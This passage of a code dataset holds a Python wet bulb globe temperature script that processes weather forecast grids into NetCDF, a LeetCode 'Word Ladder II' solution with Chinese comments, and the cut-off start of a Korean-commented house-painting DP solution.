Masking\")\n#statemasks, statelabels, states = utilities.to_state(gdf, statelist=statelist)\n#\n#dimmasks = [None]*len(statemasks)\n#combined_mask = np.full((1,ny,nx), False)\n#for row in range(0, len(statemasks)):\n# statemask = statemasks[row]\n# mask = statemask.to_numpy()\n# dimmasks[row] = mask.reshape(1,ny,nx)\n# combined_mask = np.logical_or(combined_mask, dimmasks[row])\n#\n## Keeping mask because elevation data does not encompass entire model domain\nlog.info(\"DO NOT Mask Application\")\ncombined_mask = np.full((1,ny,nx), True)\n\n#%%% Mask Application\nlog.info(\"Mask Application\")\n# Apply masks to longitude and latitude arrays\nlon_array_masked = np.where(combined_mask, lon_array, np.nan)\nlat_array_masked = np.where(combined_mask, lat_array, np.nan)\n\n# Create \"stacked\" arrays spanning across time scales\nlon_mask_RTMA = np.repeat(lon_array_masked, len(times_rtma), axis=0)\nlat_mask_RTMA = np.repeat(lat_array_masked, len(times_rtma), axis=0)\n\nlon_mask_NDFD = np.repeat(lon_array_masked, len(times_ndfd), axis=0)\nlat_mask_NDFD = np.repeat(lat_array_masked, len(times_ndfd), axis=0)\n\nlon_mask_mix = np.repeat(lon_array_masked, len(times_mix), axis=0)\nlat_mask_mix = np.repeat(lat_array_masked, len(times_mix), axis=0)\n \n#%% Solar Calculations\n#%%% Time\nlog.info(\"Timing\")\njday_RTMA, hour_RTMA, jday_NDFD, hour_NDFD, jday_mix, hour_mix = utilities.timing(z=Z,nx=nx,ny=ny,nt=nt)\njday_RTMA_mask = np.where(combined_mask, jday_RTMA, np.nan)\njday_NDFD_mask = np.where(combined_mask, jday_NDFD, np.nan)\njday_mix_mask = np.where(combined_mask, jday_mix, np.nan)\n\nzenith_RTMA, zenith_NDFD, zenith_mix = equations.solar_calc(lat_mask_RTMA, \n lon_mask_RTMA, \n jday_RTMA_mask, \n hour_RTMA, \n lat_mask_mix, \n lon_mask_mix, \n jday_mix_mask, \n hour_mix)\n\n# Restrict data to 2 times\n#log.info(\"Restricting items for two times FOR TESTING\")\n#jday_RTMA = jday_RTMA[:2,:,:]\n#jday_RTMA_mask = jday_RTMA_mask[:2,:,:]\n#hour_RTMA = hour_RTMA[:2,:,:]\n#zenith_RTMA = zenith_RTMA[:2,:,:]\n#jday_NDFD = jday_NDFD[:2,:,:]\n#jday_NDFD_mask = jday_NDFD_mask[:2,:,:]\n#hour_NDFD = hour_NDFD[:2,:,:]\n#zenith_NDFD = zenith_NDFD[:2,:,:]\n#jday_mix = jday_mix[:2,:,:]\n#jday_mix_mask = jday_mix_mask[:2,:,:]\n#hour_mix = hour_mix[:2,:,:]\n#zenith_mix = zenith_mix[:2,:,:]\n\nif DEBUGMODE:\n print(\"jday_RTMA: \",jday_RTMA[:,300,300])\n print(\"jday_RTMA_mask: \",jday_RTMA_mask[:,300,300])\n print(\"hour_RTMA: 
\",hour_RTMA[:,300,300])\n print(\"zenith_RTMA: \",zenith_RTMA[:,300,300])\n\n#%% Data Imports\nlog.info(\"Data Loading\")\nif not TESTMODE:\n #v1\n #vars_RTMA, data_RTMA, unit_RTMA, fill_RTMA = utilities.RTMA_import(\"resources/WBGT_RTMA.nc\")\n #vars_NDFD, data_NDFD, unit_NDFD, fill_NDFD = utilities.NDFD_import(\"resources/WBGT_NDFD.nc\")\n #vars_NBM, data_NBM = utilities.small_import(\"resources/WBGT_NBM.nc4\")\n #v2 - Convert to NC4 before\n log.info(\"Loading Real Data\")\n vars_RTMA, data_RTMA, unit_RTMA, fill_RTMA = utilities.RTMA_import(\"input/rtma.nc\")\n vars_NDFD, data_NDFD, unit_NDFD, fill_NDFD = utilities.NDFD_import(\"input/ndfd.nc\") #CHECK\n #vars_NBM, data_NBM = utilities.small_import(\"input/nbm.nc\")\n vars_NBM, data_NBM,unit_NBM,fill_NBM = utilities.NBM_import(\"input/nbm.nc\")\n #v3 - Native dataset format\n #vars_RTMA, data_RTMA, unit_RTMA, fill_RTMA = utilities.RTMA_import_grib(\"input/rtma_combo.grb2\")\n #print(data_RTMA)\n\nelif TESTMODE:\n log.info(\"Loading Test Data\")\n data_RTMA = utilities.data_gen(\"RTMA\")\n data_NDFD = utilities.data_gen(\"NDFD\")\n data_NBM = utilities.data_gen(\"NBM\")\n\n# get the elevation data\n#vars_elev, data_elev = utilities.small_import(\"resources/elevation_regrid_NCVA.nc\")\nvars_elev, data_elev = utilities.small_import(\"resources/elevation_regrid_sercc.nc\")\nelev_var = data_elev[\"var\"]\nif DEBUGMODE:\n print(\"data_elev: \",elev_var.shape)\n print(\"data_elev: \",elev_var[300,300])\n\n##%%% RTMA Bias Correction\nlog.info(\"SERCC's RTMA Bias Correction\")\ndata_RTMA = utilities.RTMA_bias(data_RTMA, z=Z)\n#log.info(\"SERCC's NDFD Bias Correction\")\n#data_NDFD = utilities.NDFD_bias(data_NDFD, z=Z)\n#log.info(\"SERCC's NBM Bias Correction\")\n#data_NBM = utilities.NBM_bias(data_NBM, z=Z)\n\n#%%% Wind Speed Correction\nlog.info(\"Wind Speed Correction\")\ndata_RTMA[\"WIND_10maboveground\"] = np.where(data_RTMA[\"WIND_10maboveground\"] < 0.5, \n 0.5, data_RTMA[\"WIND_10maboveground\"])\ndata_NDFD[\"WIND_10maboveground\"] = np.where(data_NDFD[\"WIND_10maboveground\"] < 0.5, \n 0.5, data_NDFD[\"WIND_10maboveground\"])\n#data_NDFD[\"WIND_10maboveground\"] = np.where(data_NDFD[\"WIND_10maboveground\"] < 0.5, \n# 0.5, data_NDFD[\"WIND_10maboveground\"])\ndata_NBM[\"WIND_10maboveground\"] = np.where(data_NBM[\"WIND_10maboveground\"] < 0.5, \n 0.5, data_NBM[\"WIND_10maboveground\"])\n\n#%%% Name Variables\nlog.info(\"Variable Refactoring\")\nlat_RTMA = data_RTMA[\"latitude\"]\nlon_RTMA = data_RTMA[\"longitude\"]\ntemp_RTMA = data_RTMA[\"TMP_2maboveground\"]\ndewp_RTMA = data_RTMA[\"DPT_2maboveground\"]\nwind_RTMA = data_RTMA[\"WIND_10maboveground\"]\n#cldc_RTMA = data_RTMA[\"TCDC_surface\"]\ncldc_RTMA = data_RTMA[\"TCDC_entireatmosphere_consideredasasinglelayer_\"]\n\nlat_NDFD = data_NDFD[\"latitude\"]\nlon_NDFD = data_NDFD[\"longitude\"]\ntemp_NDFD = data_NDFD[\"TMP_2maboveground\"]\ndewp_NDFD = data_NDFD[\"DPT_2maboveground\"]\nwind_NDFD = data_NDFD[\"WIND_10maboveground\"]\ncldc_NDFD = data_NDFD[\"TCDC_surface\"]\n\nlat_NBM = data_NBM[\"latitude\"]\nlon_NBM = data_NBM[\"longitude\"]\ntemp_NBM = data_NBM[\"TMP_2maboveground\"]\ndewp_NBM = data_NBM[\"DPT_2maboveground\"]\nwind_NBM = data_NBM[\"WIND_10maboveground\"]\ncldc_NBM = data_NBM[\"TCDC_surface\"]\n\n# Increase the speed here\nelev = np.atleast_3d(data_elev[\"var\"])\n# Get the elevation\nelev = np.swapaxes(elev, 0, 1)\nelev = np.swapaxes(elev, 0, 2)\n#print(elev.shape)\n#print(\"elev: \",elev[0,:,300])\n\n##%%% Combine NDFD and NBM\nlog.info(\"Combine NDFD and NBM 
datasets\")\ntemp_mix = np.concatenate((temp_NDFD, temp_NBM[46:,:,:]), axis=0)\ndewp_mix = np.concatenate((dewp_NDFD, dewp_NBM[46:,:,:]), axis=0)\nwind_mix = np.concatenate((wind_NDFD, wind_NBM[46:,:,:]), axis=0)\ncldc_mix = np.concatenate((cldc_NDFD, cldc_NBM[46:,:,:]), axis=0)\n\n# From this point forward, all calculations should be just \n# 1) RTMA\n# OR\n# 2) mix and NOT NDFD/NBM\n\n## DON'T COMBINE FOR NOW\n#log.info(\"DO NOT Combine NDFD and NBM datasets. Using NBM instead\")\n#temp_mix = temp_NBM\n#dewp_mix = dewp_NBM\n#wind_mix = wind_NBM\n#cldc_mix = cldc_NBM\n\n#%%% Mask Arrays\nlog.info(\"SKIP Mask Imported Arrays\")\ntemp_RTMA = np.where(combined_mask, temp_RTMA, np.nan)\ndewp_RTMA = np.where(combined_mask, dewp_RTMA, np.nan)\nwind_RTMA = np.where(combined_mask, wind_RTMA, np.nan)\ncldc_RTMA = np.where(combined_mask, cldc_RTMA, np.nan)\nelev_RTMA = np.where(combined_mask, elev, np.nan)\n#\ntemp_mix = np.where(combined_mask, temp_mix, np.nan)\ndewp_mix = np.where(combined_mask, dewp_mix, np.nan)\nwind_mix = np.where(combined_mask, wind_mix, np.nan)\ncldc_mix = np.where(combined_mask, cldc_mix, np.nan)\nelev_mix = np.where(combined_mask, elev, np.nan)\n\n#%%% Unit Conversion\nlog.info(\"Convert Temperature Units\")\nt_conv = 273.15\n\ntemp_RTMA -= t_conv\ndewp_RTMA -= t_conv\ncldc_RTMA = cldc_RTMA/100.0\n\n#cldc_NDFD = cldc_NDFD/100.0\n\ntemp_mix -= t_conv\ndewp_mix -= t_conv\ncldc_mix = cldc_mix/100.0\n\n#%% Solar Intensity\n#%%% Calculate Relative Humidity\nlog.info(\"Calculate Relative Humidity\")\nrh_RTMA = equations.rh_calc(temp_RTMA, dewp_RTMA)\nrh_mix = equations.rh_calc(temp_mix, dewp_mix)\n\n#%%% Solar Radiation\nlog.info(\"Calculate Solar Radiation\")\nnght_RTMA = np.where((hour_RTMA <= 10) & (hour_RTMA >= 0), 0, 1)\nnght_mix = np.where((hour_mix <= 10) & (hour_mix >= 0), 0, 1)\n\n#print(\"nght_RTMA: \",nght_RTMA[:,300,300])\n#print(\"zenith_rtma=\",zenith_RTMA.shape)\n#print(\"elev_rtma=\",elev_RTMA.shape)\n\nif DEBUGMODE:\n print(\"lat_RTMA: \",lat_RTMA[300,300])\n print(\"lon_RTMA: \",lon_RTMA[300,300])\n print(\"zenith_RTMA: \",zenith_RTMA[:,300,300])\n print(\"elev_RTMA: \",elev_RTMA[:,300,300])\n print(\"jday_RTMA: \",jday_RTMA[:,300,300])\n print(\"hour_RTMA: \",hour_RTMA[:,300,300])\n\n#%% Data Imports\n\n#\n# ISSUE IS HERE\n#\nsr_RTMA = equations.solar_rad(jday_RTMA, hour_RTMA, \n lat_RTMA, lon_RTMA, \n zenith_RTMA, elev_RTMA)\n\nsr_RTMA = np.where(combined_mask, sr_RTMA, np.nan)*nght_RTMA\nif DEBUGMODE:\n print(\"sr_RTMA: \",sr_RTMA[:,300,300])\n\nsun_RTMA = utilities.srad_bias(sr_RTMA, z=Z)\nshd_RTMA = utilities.srad_bias(sr_RTMA*(1-0.75*(1**3.4)), z=Z)\nact_RTMA = utilities.srad_bias(sr_RTMA*(1-0.75*(np.power(cldc_RTMA, 3.4))), z=Z)\n\n\nsr_mix = equations.solar_rad(jday_mix, hour_mix, \n lat_mix, lon_mix, \n zenith_mix, elev_mix)\n\nsr_mix = np.where(combined_mask, sr_mix, np.nan)*nght_mix\n\nsun_mix = sr_mix\nshd_mix = sr_mix*(1-0.75*(1**3.4))\n#print(\"sr_mix = \",sr_mix.shape)\n#print(\"cldc_mix = \",cldc_mix.shape)\nact_mix = sr_mix*(1-0.75*(np.power(cldc_mix, 3.4)))\n\n#%%% Morning Shade\nlog.info(\"Calculate Morning Shade\")\nmshd_RTMA = np.where((hour_RTMA >= 10) & (hour_RTMA <= 14), True, False)\nmshd_mix = np.where((hour_mix >= 10) & (hour_mix <= 14), True, False)\n\nsun_RTMA = np.where(mshd_RTMA, shd_RTMA, sun_RTMA)\nif DEBUGMODE:\n print(\"sun_RTMA: \",sun_RTMA[:,300,300])\nact_RTMA = np.where(mshd_RTMA, shd_RTMA, act_RTMA)\n\nsun_mix = np.where(mshd_mix, shd_mix, sun_mix)\nact_mix = np.where(mshd_mix, shd_mix, act_mix)\n\n#%%% Theoretical 
Maximum Solar Radiation\nlog.info(\"Calculate Maximum Solar Radiation\")\nsmax_RTMA = equations.solar_max(jday_RTMA_mask, zenith_RTMA)\nif DEBUGMODE:\n print(\"smax_RTMA: \",smax_RTMA[:,300,300])\nsmax_mix = equations.solar_max(jday_mix_mask, zenith_mix)\n\nsun_RTMA = np.where(sun_RTMA >= smax_RTMA, smax_RTMA, sun_RTMA)\nshd_RTMA = np.where(shd_RTMA >= smax_RTMA, smax_RTMA, shd_RTMA)\nact_RTMA = np.where(act_RTMA >= smax_RTMA, smax_RTMA, act_RTMA)\n\nsun_mix = np.where(sun_mix >= smax_mix, smax_mix, sun_mix)\nshd_mix = np.where(shd_mix >= smax_mix, smax_mix, shd_mix)\nact_mix = np.where(act_mix >= smax_mix, smax_mix, act_mix)\n\nstarsun_RTMA = sun_RTMA/smax_RTMA\nstarshd_RTMA = shd_RTMA/smax_RTMA\nstaract_RTMA = act_RTMA/smax_RTMA\n\nstarsun_mix = sun_mix/smax_mix\nstarshd_mix = shd_mix/smax_mix\nstaract_mix = act_mix/smax_mix\n\n\n#%%% Diffuse and Direct Solar Radiation\nlog.info(\"Calculate Diffuse and Direct Solar Radiation\")\nfdb_sun_RTMA, fdif_sun_RTMA = equations.direct_diffuse(zenith_RTMA, starsun_RTMA)\nfdb_shd_RTMA, fdif_shd_RTMA = equations.direct_diffuse(zenith_RTMA, starshd_RTMA)\nfdb_act_RTMA, fdif_act_RTMA = equations.direct_diffuse(zenith_RTMA, staract_RTMA)\n\nfdb_sun_mix, fdif_sun_mix = equations.direct_diffuse(zenith_mix, starsun_mix)\nfdb_shd_mix, fdif_shd_mix = equations.direct_diffuse(zenith_mix, starshd_mix)\nfdb_act_mix, fdif_act_mix = equations.direct_diffuse(zenith_mix, staract_mix) \n\n#%% Wind Speed \n#%%% Estimate Stability Class\nlog.info(\"Estimate Wind Stability Class\")\nstabt_sun_RTMA = equations.stability(nght_RTMA, wind_RTMA, sun_RTMA)\nstabt_act_RTMA = equations.stability(nght_RTMA, wind_RTMA, act_RTMA)\nstabt_shd_RTMA = equations.stability(nght_RTMA, wind_RTMA, shd_RTMA)\n\nstabt_sun_mix = equations.stability(nght_mix, wind_mix, sun_mix)\nstabt_act_mix = equations.stability(nght_mix, wind_mix, act_mix)\nstabt_shd_mix = equations.stability(nght_mix, wind_mix, shd_mix)\n\n#%%% Estimate Wind Speed\nlog.info(\"Estimate Wind Speed\")\nest_speed_sun_RTMA = equations.est_wind_speed(wind_RTMA, stabt_sun_RTMA)\nest_speed_act_RTMA = equations.est_wind_speed(wind_RTMA, stabt_act_RTMA)\nest_speed_shd_RTMA = equations.est_wind_speed(wind_RTMA, stabt_shd_RTMA)\n\nest_speed_sun_mix = equations.est_wind_speed(wind_mix, stabt_sun_mix)\nest_speed_act_mix = equations.est_wind_speed(wind_mix, stabt_act_mix)\nest_speed_shd_mix = equations.est_wind_speed(wind_mix, stabt_shd_mix)\n\n#%% Natural Wet Bulb Temp\n#%%% Radiative Heating Switch\nlog.info(\"Radiative Heating\")\nrad_RTMA = np.where(nght_RTMA == 0, 1, 0)\nrad_mix = np.where(nght_mix == 0, 1, 0)\n\n#%%% Calculate Wet Bulb Temperature\nlog.info(\"Calculate Wet Bulb Temperature for RTMA Dataset\")\ntwb_sun_RTMA = equations.twb(temp_RTMA, dewp_RTMA, rh_RTMA, est_speed_sun_RTMA, sun_RTMA, fdb_sun_RTMA, np.cos(zenith_RTMA*np.pi/180), rad_RTMA)\nif DEBUGMODE:\n print(\"dewp_RTMA: \",dewp_RTMA[:,300,300])\n print(\"rh_RTMA: \",rh_RTMA[:,300,300])\n print(\"est_speed_sun_RTMA: \",est_speed_sun_RTMA[:,300,300])\n print(\"sun_RTMA: \",sun_RTMA[:,300,300])\n print(\"fdb_sun_RTMA: \",fdb_sun_RTMA[:,300,300])\n print(\"zenith_RTMA: \",zenith_RTMA[:,300,300])\n print(\"rad_RTMA: \",rad_RTMA[:,300,300])\ntwb_shade_RTMA = equations.twb(temp_RTMA, dewp_RTMA, rh_RTMA, est_speed_shd_RTMA, shd_RTMA, fdb_shd_RTMA, np.cos(zenith_RTMA*np.pi/180), rad_RTMA)\ntwb_actual_RTMA = equations.twb(temp_RTMA, dewp_RTMA, rh_RTMA, est_speed_act_RTMA, act_RTMA, fdb_act_RTMA, np.cos(zenith_RTMA*np.pi/180), rad_RTMA)\n\nlog.info(\"Calculate Wet Bulb 
Temperature for mix Dataset\")\ntwb_sun_mix = equations.twb(temp_mix, dewp_mix, rh_mix, est_speed_sun_mix, sun_mix, fdb_sun_mix, np.cos(zenith_mix*np.pi/180), rad_mix)\nif DEBUGMODE:\n print(twb_sun_mix[:,300,300])\ntwb_shade_mix = equations.twb(temp_mix, dewp_mix, rh_mix, est_speed_shd_mix, shd_mix, fdb_shd_mix, np.cos(zenith_mix*np.pi/180), rad_mix)\ntwb_actual_mix = equations.twb(temp_mix, dewp_mix, rh_mix, est_speed_act_mix, act_mix, fdb_act_mix, np.cos(zenith_mix*np.pi/180), rad_mix)\n\n#%%% Calculate Wet Globe Temperature\nlog.info(\"Calculate Wet Globe Temperature for RTMA Dataset\")\ntglobe_sun_RTMA = equations.tglobe(temp_RTMA, dewp_RTMA, rh_RTMA, est_speed_sun_RTMA, sun_RTMA, fdb_sun_RTMA, np.cos(zenith_RTMA*np.pi/180))\nif DEBUGMODE:\n print(tglobe_sun_RTMA[:,300,300])\ntglobe_shade_RTMA = equations.tglobe(temp_RTMA, dewp_RTMA, rh_RTMA, est_speed_shd_RTMA, shd_RTMA, fdb_shd_RTMA, zenith_RTMA*np.pi/180)\ntglobe_actual_RTMA = equations.tglobe(temp_RTMA, dewp_RTMA, rh_RTMA, est_speed_act_RTMA, act_RTMA, fdb_act_RTMA, zenith_RTMA*np.pi/180)\n\nlog.info(\"Calculate Wet Globe Temperature for mix Dataset\")\ntglobe_sun_mix = equations.tglobe(temp_mix, dewp_mix, rh_mix, est_speed_sun_mix, sun_mix, fdb_sun_mix, zenith_mix*np.pi/180)\nif DEBUGMODE:\n print(tglobe_sun_mix[:,300,300])\ntglobe_shade_mix = equations.tglobe(temp_mix, dewp_mix, rh_mix, est_speed_shd_mix, shd_mix, fdb_shd_mix, zenith_mix*np.pi/180)\ntglobe_actual_mix = equations.tglobe(temp_mix, dewp_mix, rh_mix, est_speed_act_mix, act_mix, fdb_act_mix, zenith_mix*np.pi/180)\n\n#%% Wet Bulb Globe Temperature\n#%%% Calculate Wet Bulb Globe Temperature\nlog.info(\"Combine Wet Bulb and Wet Globe Temperature for RTMA Dataset\")\nWBGT_sun_RTMA = 0.7*twb_sun_RTMA + 0.2*tglobe_sun_RTMA + 0.1*temp_RTMA\nif DEBUGMODE:\n print(WBGT_sun_RTMA[:,300,300])\nWBGT_shade_RTMA = 0.7*twb_shade_RTMA + 0.2*tglobe_shade_RTMA + 0.1*temp_RTMA\nWBGT_actual_RTMA = 0.7*twb_actual_RTMA + 0.2*tglobe_actual_RTMA + 0.1*temp_RTMA\n\nlog.info(\"Combine Wet Bulb and Wet Globe Temperature for mix Dataset\")\nWBGT_sun_mix = 0.7*twb_sun_mix + 0.2*tglobe_sun_mix + 0.1*temp_mix\nif DEBUGMODE:\n print(WBGT_sun_mix[:,300,300])\nWBGT_shade_mix = 0.7*twb_shade_mix + 0.2*tglobe_shade_mix + 0.1*temp_mix\nWBGT_actual_mix = 0.7*twb_actual_mix + 0.2*tglobe_actual_mix + 0.1*temp_mix\n\nlog.info(\"Combine RTMA and mix (NDFD/NBM) Datasets\")\n#Convert from C to F\nWBGT_sun = np.concatenate((WBGT_sun_RTMA*(9/5)+32, WBGT_sun_mix*(9/5)+32), axis=0)\nWBGT_shade = np.concatenate((WBGT_sun_RTMA*(9/5)+32, WBGT_sun_mix*(9/5)+32), axis=0)\nWBGT_actual = np.concatenate((WBGT_sun_RTMA*(9/5)+32, WBGT_sun_mix*(9/5)+32), axis=0)\n\nWBGT_airtemp = np.concatenate((temp_RTMA*(9/5)+32, temp_mix*(9/5)+32), axis=0)\n\n#%%% Export Wet Bulb Globe Temperature\nlog.info(\"Export NetCDF Version 4\")\noutfilename = \"wbgt_\"+vdate_ymdh+\".nc4\"\noutfile = Dataset(outfilename, \"w\", format=\"NETCDF4\")\n\n#outfile.title = 'Wet Bulb Globe Temperature (WBGT) forecast using RTMA, NDFD, and NBM. 
Written for SERCC by NC SCO'\noutfile.institution = \"Southeast Regional Climate Center\"\noutfile.source = \"TBD\"\noutfile.Conventions = 'CF-1.5'\noutfile.references = \"TBD\"\noutfile.validtime = vtime_rtma\n\n# Create the dimensions\n#lon = outfile.createDimension(\"lat\", nx)\n#lat = outfile.createDimension(\"lon\", ny)\n#time = outfile.createDimension(\"time\", None)\ny = outfile.createDimension(\"y\", ny)\nx = outfile.createDimension(\"x\", nx)\nt = outfile.createDimension(\"t\", None)\n\n### create time axis\nout_time = outfile.createVariable('time', 'f8', ('t'),zlib=True)\nout_time.setncatts({\n 'standard_name': u\"time\",\\\n 'long_name': u\"time\",\\\n #'units':u\"Hours Since \"+vtime+\"\",\\\n 'units':u\"Seconds since 1970-01-01 00:00:00.0 0:00\",\\\n 'coordinates':u'time',\\\n '_CoordinateAxisType':U'Time',\\\n 'calendar':u'gregorian',\\\n 'reference_date':u\"\"+vtime_rtma+\"\",\\\n})\nout_time[:]=times[:]\n\n# create latitude axis\nout_lat = outfile.createVariable('latitude', 'f8', ('y','x'),zlib=True)\nout_lat.setncatts({\n 'standard_name': u\"latitude\",\\\n 'long_name': u\"latitude\",\\\n 'units':u\"degrees_north\",\\\n '_CoordinateAxisType':u\"Lat\",\\\n# 'coordinates':u'latitude',\\\n})\nout_lat[:,:]=lat_RTMA[:,:]\n\n# create longitude axis\nout_lon = outfile.createVariable('longitude', 'f8', ('y','x'),zlib=True)\nout_lon.setncatts({\n 'standard_name': u\"longitude\",\\\n 'long_name': u\"longitude\",\\\n 'units':u\"degrees_east\",\\\n '_CoordinateAxisType':u\"Lon\",\\\n# 'coordinates':u'longitude',\\\n})\nout_lon[:,:]=lon_RTMA[:,:]-360\n\n### Add the data source\nout_source = outfile.createVariable('source', 'S10', ('t'),zlib=True)\nout_source.setncatts({\n 'standard_name': u\"Data Source Used\",\\\n 'long_name': u\"Data Source Used\",\\\n})\nout_source[:]=times_source[:]\n\n# create latitude axis\n\n# Add the air temp\n#log.info(\"Writing out air temp to file\")\n#WBGT_airtemp_var = outfile.createVariable(\"airtemp\",\"f8\",('t','y','x'),zlib=True)\n#WBGT_airtemp_var.setncatts({\n# 'long_name': u\"Air Temperature\",\\\n# 'units': u\"degF\", 'level_desc': u'Surface',\\\n# 'var_desc': u\"Air Temperature\",\\\n# 'coordinates':u'latitude longitude',\\\n# 'level_desc':u\"Surface\",\\\n# 'min': 0,\\\n#})\n#WBGT_airtemp_var[:,:,:] = WBGT_airtemp[:,:,:]\n\n# Add the WBGT_SUN\nlog.info(\"Writing out WBGT Sun to file\")\nWBGT_sun_var = outfile.createVariable(\"wbgt_sun\",\"f8\",('t','y','x'),zlib=True)\n#WBGT_sun_var = outfile.createVariable(\"wbgt_sun\",\"f8\",('y','x','t'),zlib=True)\nWBGT_sun_var.setncatts({\n 'long_name': u\"Sun WBGT\",\\\n 'units': u\"degF\", 'level_desc': u'Surface',\\\n 'var_desc': u\"Sun WBGT\",\\\n 'coordinates':u'latitude longitude',\\\n 'level_desc':u\"Surface\",\\\n 'min': 0,\\\n})\n#print(\"var WBGT_sun=\",WBGT_sun.shape)\n#print(\"nc WBGT_sun=\",WBGT_sun_var.shape)\nWBGT_sun_var[:,:,:] = WBGT_sun[:,:,:]\n#outfile.variables['wbgt_sun'][:] = WBGT_sun\n\n# Add the WBGT_SHADE\n#WBGT_shade_var = outfile.createVariable(\"wbgt_shade\",\"f8\",('lat','lon','time'),zlib=True)\n#WBGT_shade_var = outfile.createVariable(\"wbgt_shade\",\"f8\",('y','x','t'),zlib=True)\nlog.info(\"Writing out WBGT Shade to file\")\nWBGT_shade_var = outfile.createVariable(\"wbgt_shade\",\"f8\",('t','y','x'),zlib=True)\nWBGT_shade_var.setncatts({\n 'long_name': u\"Shade WBGT\",\\\n 'units': u\"degF\", 'level_desc': u'Surface',\\\n 'var_desc': u\"Shade WBGT\",\\\n 'coordinates':u'latitude longitude',\\\n 'level_desc':u\"Surface\",\\\n 'min': 0,\\\n})\nWBGT_shade_var[:,:,:] = 
WBGT_shade[:,:,:]\n\n# Add the WBGT_ACTUAL\n#WBGT_actual_var = outfile.createVariable(\"wbgt_actual\",\"f8\",('y','x','t'),zlib=True)\nlog.info(\"Writing out WBGT Actual to file\")\nWBGT_actual_var = outfile.createVariable(\"wbgt_actual\",\"f8\",('t','y','x'),zlib=True)\nWBGT_actual_var.setncatts({\n 'long_name': u\"Actual WBGT\",\\\n 'units': u\"degF\", 'level_desc': u'Surface',\\\n 'var_desc': u\"Actual WBGT\",\\\n 'coordinates':u'latitude longitude',\\\n 'level_desc':u\"Surface\",\\\n 'min': 0,\\\n})\nWBGT_actual_var[:,:,:] = WBGT_actual[:,:,:]\noutfile.close()\n","repo_name":"jamcguir/wbgt_python","sub_path":"WBGT.py","file_name":"WBGT.py","file_ext":"py","file_size_in_byte":24603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"12557900092","text":"#\n# @lc app=leetcode id=126 lang=python3\n#\n# [126] Word Ladder II\n#\n\n\n# @lc code=start\n\n\nclass Solution:\n def findLadders(\n self, beginWord: str, endWord: str, wordList: List[str]\n ) -> List[List[str]]:\n import collections\n\n # 定义答案\n ans = []\n # 转为set,判断是否存在快很多, 不然127题就会超时\n wordList = set(wordList)\n\n # 终点如果不存在于单词中,直接返回\n if endWord not in wordList:\n return ans\n\n # 我们下面题解中会多次用到一个单词对应的路径的最短距离:\n # 这个是指这个单词在最短路径中离beginWord或者离endWord的距离(根据方向不同,降序升序也有不同)\n\n # 首先先用一遍bfs去找到终点对应的路径的最短距离\n # 这里用dist记录从beginWord到某个单词的最短距离,遇到endWord就跳出\n # 这样子最后符合条件的最短路径中终点之前的单词的最短路径的距离也会被保存下来\n dist = {}\n dist[beginWord] = 0\n\n # BFS\n st = collections.deque()\n st.append(beginWord)\n\n def f():\n while st:\n q = st.popleft()\n for xx in range(len(q)):\n for index in range(97, 123):\n tempq = q[:xx] + chr(index) + q[xx + 1 :]\n if tempq in wordList and tempq not in dist:\n dist[tempq] = dist[q] + 1\n if tempq == endWord:\n return\n st.append(tempq)\n\n f()\n # BFS end\n\n # 重点来了,敲黑板\n # 因为我们前面找最短长度时候,是顺着找,其实是有很多路径试错的\n # 特别是加的那个第32个测试用例,\"aaaaa\",\"ggggg\"那个\n # 如果我们再找路径的时候还是和上面的一样顺着遍历, 我pycharm跑了好久都没跑出来, 试错路径太多了\n\n # 这里我们反着来, 正着找和反着找,试错的路径会有很多不一样,但是能到终点的正确的路径是会包含的\n # 为何? 这里要体会一下,因为我们在第一步中仅仅是找到路径的长度\n # 并且! 
所有比目标矮一级的单词我们都找到了(bfs性质)\n\n # 第一步中找到的节点对应的长度只是所有节点的子集, 下面这里也只用到了路径的长度这一个信息\n\n # 从终点开始遍历, 那么越离起点进,dist里面值是越小的\n # 所以判断是dist[root] == dist[temproot] + 1:\n # 当前单词的距离 = 改一个字母的单词的距离 + 1\n path = [endWord]\n\n def bfs(root):\n # 遇到起点,反向,加入答案\n if root == beginWord:\n ans.append(path[::-1])\n else:\n for xx in range(len(root)):\n for index in range(97, 123):\n # temproot是改变了一个单词的root\n temproot = root[:xx] + chr(index) + root[xx + 1 :]\n # 重点来了,如果temproot的高度我们获取到了\n # 那么最短路径是可能包含这个单词的(也可能不包含,得试)\n # 然后如果我们下一个遍历的单词的长度是\n if temproot in dist and dist[root] == dist[temproot] + 1:\n path.append(temproot)\n bfs(temproot)\n path.pop()\n\n bfs(endWord)\n return ans\n\n\n# class Solution:\n# def findLadders(\n# self, beginWord: str, endWord: str, wordList: list[str]\n# ) -> list[list[str]]:\n# # import copy\n# from collections import deque\n\n# wordSet = set(wordList)\n# if endWord not in wordSet:\n# return []\n# queue = deque()\n# visited = set()\n# beginList = list()\n# beginList.append(beginWord)\n# resList = list()\n# queue.append(beginList)\n# foundMinStep = False\n# while queue and not foundMinStep:\n# size = len(queue)\n# for idx in range(size):\n# curList = queue.popleft()\n\n# if curList[-1] == endWord:\n# foundMinStep = True\n# resList.append(curList)\n# else:\n# if curList[-1] not in visited:\n# curWord = curList[-1]\n# wordSet.discard(curWord)\n# for charIndex in range(len(curWord)):\n# # for every pos in this word,\n# for i in range(26):\n# # test 26 letter in this pos\n# newChar = chr(ord(\"a\") + i)\n# newWord = (\n# curWord[:charIndex]\n# + newChar\n# + curWord[charIndex + 1 :]\n# )\n# # print(newWord)\n# if newWord == curWord:\n# continue\n# if newWord not in wordSet:\n# continue\n# # if newWord not in visited:\n# # visited.add(newWord)\n# newList = curList[:]\n# newList.append(newWord)\n# queue.append(newList)\n# # print(newList)\n# return resList\n\n\n# @lc code=end\n","repo_name":"REDhawC/LeetCode","sub_path":"126.word-ladder-ii.py","file_name":"126.word-ladder-ii.py","file_ext":"py","file_size_in_byte":5867,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"23417661557","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\n# 입력\r\nN = int(input()) # 집의 개수\r\ncost = [list(map(int, input().split())) for _ in range(N)] # cost[i] = i번째 집을 [빨간색, 초록색, 파란색] 으로 칠하는 비용\r\n\r\n# dp 배열 채우기\r\n'''\r\ndp[0] = cost[0]\r\ndp[i] = [\r\n 첫번째 집을 빨간색으로 칠하고 i번째 집을 [빨간색, 초록색, 파란색] 으로 칠하는 비용\r\n 첫번째 집을 초록색으로 칠하고 i번째 집을 [빨간색, 초록색, 파란색] 으로 칠하는 비용\r\n 첫번째 집을 파란색으로 칠하고 i번째 집을 [빨간색, 